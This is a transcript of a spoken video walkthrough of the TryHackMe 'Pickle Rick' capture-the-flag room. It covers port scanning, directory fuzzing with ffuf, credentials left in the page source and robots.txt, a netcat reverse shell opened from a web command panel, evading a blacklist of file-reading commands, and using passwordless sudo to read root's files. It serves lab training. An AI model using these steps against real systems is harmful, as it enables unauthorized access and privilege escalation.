Hey guys, welcome back. Hope you all are doing well. This is Mohammad Badrudduja, and today we are going to solve a CTF machine from the Tryhackme. The machine name is Pickle Rig, and this is CTF. So, in this machine, what basically you need to do is uh, there are two guys, Rick and Morty. It's a challenge, as I mentioned before, CTF. So, we need to exploit a web server and we need to find three ingredients. So that ingredients will help Rick to make his potion to transform himself back into a human from a pickle. So deploy the virtual machine and you can explore the web application on this IP. I already deployed the virtual machine. This is the IP of the virtual machine. So uh, come back here, come here. So this is the IP for the virtual machine, target machine, and this is my IP. And the next thing is uh, because we already told that there is a web server and we need to deploy the web server, but I already scanned the target, so I'm not going to scan again. I'm just going to show you the scan results. So cat default .nmap. So this was the result where we found two ports open. One is port number 22 and another port is port number 80, Apache HTTPD 2.4.18. So 22 comma port number 80. Let's go and directly we will visit port number 80. That is http colon slash slash hit enter, and as we can see, this is the web application running on that port. So listen Morty, I need your help. I have turned myself into a pickle again, and this time I can't change back. I need you to burp, and Morty, log on to my computer and find the last three secret ingredients to finish my pickle reverse potion. And the only problem is I have no idea what the burp password was. Help Morty, help. Okay. So this is the message for Morty. Next thing I wanna, before going to see the view page source, for this I'm going to use GoBuster, or we can also use fuzz, because fuzz I think is fuff, sorry, FFUF. Okay, space -w for the word list. So user share word list and derb slash common dot text space -u http colon slash slash, and the IP is this slash fuzzz fuzz, and let's say number of threads I'm trying to use is 60, and space hyphen only response code with 200 I want to see. Hit enter. Okay, so let it run and we will come back. So there is index.html. Fine, let's go back to the web application and try to see the page source. And in the page source there is a folder assets directory, and inside it same like we have the JS and CSS file, and background image coming from asset slash rick and morty.jpeg. So the asset folder or directory could be interesting, but the most interesting part is this. So note to self, remember username, and we got the username here. So the username is rick rules. Let's note it down. So this username could be for SSH, and we can directly go to brute force with this user for SSH login. We can brute force using Hydra, but I'm not going to do it blindly. First of all, I need to enumerate and gather more and more information to be sure that okay, we need to go for brute force for SSH. But before going to that, we found here something more interesting, which is robots.txt. So Let's go and see what's inside robots.txt. Come here and let's say slash robots.txt, hit enter, and we got something. Page source. So if you go to view the page source, there is nothing but only this string, piece of string. So just copy this and I'm going to paste it here because it could be a password. So I'm taking it as password, but not sure now. Okay, or it could be a directory also. So we can visit this directory, paste, hit enter, or maybe a file. So .php, hit enter, nothing, or maybe HTML file. So .html, but nothing works. Fine. So this is actually not a directory or not a file. Fine. Next thing what we could do is in the source page. In the source page, we found one directory assets, and the main image, this image coming from that directory from assets. So I wanna visit that directory. So slash assets, hit enter, and there are many things. So Rick and Morty.jpg, this is the image. We can also actually save these images, and we can further analyze these images with the file command. Which kind of file is it? We can use exif tool to see the metadata of this file, because many times you will find some interesting or good information in the metadata of image files using exif tools. Maybe you will get the username, or maybe you will get the passwords, and maybe for different images contains different usernames. So you can create a user list and you can go for the brute force. But here I'm not going to do that. There is portal.jpg. Portal.jpg. Let's see. Here we did not find portal. So in common.txt there is portal or not? Because cat, or we can say grep portal, and yeah, portal is there, but we did not find portal. Portal.php. Let's try this. So portal, instead of portal.jpg, I'm going to try portal.php. Nothing. Without assets, if we try, and yeah, so we have now the login page, and you can go with this. Actually, why we did not get this result portal.php here? Because in this common.txt we do not have the portal. We have the portal, but we don't have the portal.php. So for this you can actually use a list from the sec list. So let's see, grep portal.php, and then you can user share word list and sec list. Inside sec list, let's say web shells or web content, word list, sec list, discovery. Inside discovery, web content, yeah, and inside web content we will have these files like raft medium files.txt, and there is one raft small. So you can use these files because these files contain the extension also. Let's try this. Copy and paste that, hit enter. So as you can see, portal.php is there. So if we use this word list, we will find portal.php here. So keep in mind always, whenever you are going to directory enumeration for the file enumeration, at that instant you must try different word lists, because what happens, sometimes you don't have the specific content in your word list, and that makes a problem. So if I take this, copy selection, paste it here, hit enter now, and with I am going to increase the number of threads, so we will process more fast. Hit enter, and as you can see now, this is giving us login.php. So login.php is there really? Yeah, login.php is there. This is actually login.php, not portal.php. But once we try portal.php, it redirects us to the login.php. So I think you have the idea now. Let's move on. So now we already have the username, which is rules. So copy this, come back here, paste. And because this is not the directory and not the file, we try few extension on it. So we can copy and try as password, hit enter, don't save, and it seems work. Yeah, it's working fine. Now there is a page where you can execute the command. So let's see, id www data. Let's try which nc. There is netcat or not? Yeah, there is netcat, but I don't know whether we will get the reversal or not, but we will try. So nc space hyphen nlvp and port number 9090, hit enter for the listening. Now nc space hyphen e and /bin/bash, and my IP is ifconfig tunnel 0. This is my IP. So copy this and paste it here on port number 9090. Execute. I think that works. No problem. pwd, where we are inside var www html portions. Only real rig can view this image. Okay, creatures. No, denied.php. Okay, portions. Everything is denied.php. Nothing changed. Portal is portal.php. Commands. So fine, we need to just now work like that. So ls space hyphen la, and we got few things. The first thing is super secret pickle ingredient dot text. Let's see what's inside this. So copy and cat, paste that here, hit enter. Command disabled to make it hard for future. We cannot command disable. Maybe we cannot execute cat command. What else we can use? Let's try strings and paste, hit enter, and yeah, Mr. Mishik here. The same thing we can try with other commands also. Paste ls space hyphen la to make sure we are doing the same thing. Less command also we can use. Paste dot text, hit enter, and yeah, same thing. ls space hyphen la super secret pickle ingredients. Yeah, so maybe this is the first ingredient. The second file is clue.txt. So let's see what's inside clue.txt. The same command we can use, which is, or the first thing, I want to copy this, come here, paste. Okay, so this is the first ingredient we got. Okay, clue.text. So cat, because cat command we cannot execute, so strings and clue.text. Maybe we find some clue here. Look around the file system for other ingredients. Fine, that's what we are going to do now. Denied.php. What is inside denied.php? So strings denied.php, page source. Okay, so inside page source there is something like base 64, I think. So I'm going to copy it, come here, don't need the listener, and what I need to do, I need to echo paste that base 64 string here and pipe it to base 64 space -d to decode that string, but it said it is not the base 64 string, invalid input. Okay, we will see it in a minute. Denied.php, everything is denied.php. Pickle rig dot, yeah, this one we already seen. Denied.php, this is the source where we execute, or we can try one more thing. Let's try grep space -R and hit enter. JS, robot.txt, help Morty, everything here, login. Okay, let's try page source, and in that page source, yeah, so all the login process is already written here, and after that you can see there is another function, string and array, and array could be only this. So sorry, can't use cat, so we cannot use cat command, head command, more, tail, nano, vim, vi. These commands we cannot use actually. Let's see, because in the clue.text we find we need to see the file system. So let's try ls space -la /home home. So inside home there is a user Rick. So this time ls space -la /home/Rick, hit enter, and this is the second ingredient. So let's say strings /home/Rick/ second ingredient, copy, paste, hit enter, and one JRE tier. So copy this, come back here, and this is gonna be the second ingredient is one JRE tier. Now we need to find out the third one. So let's see, ls space -la /root. I think permission is denied for root. Sudo space -l, we can, okay, so we can run any command, any sudo command without password. So let's try sudo /ls space -la not slash, sudo ls space -la /root, hit enter, and there is the third ingredient, and we also have .ssh. So let's try what's inside .ssh. Sudo ls space -la slash root slash .ssh. Hit enter. There is authorized key. So if we can write our public key inside this file, we can actually get SSH. But now we need to just read the third ingredient. So sudo strings slash root slash, what was that? Sudo third dot text, this one. Sudo strings root and third dot text. Hit enter, and this is the third ingredient, which is flip juice. So copy it and paste it here. That's done. We found all these three ingredients that we need to find out. So come back here. So the first one is Mr. Mishik here. Okay, we found it already. The second one is Vanjiri, we found that also. And the third one is flip juice, and we found that also. So that's done, and this is all about this CTF. So that's it for this video. See you in the next video. Bye.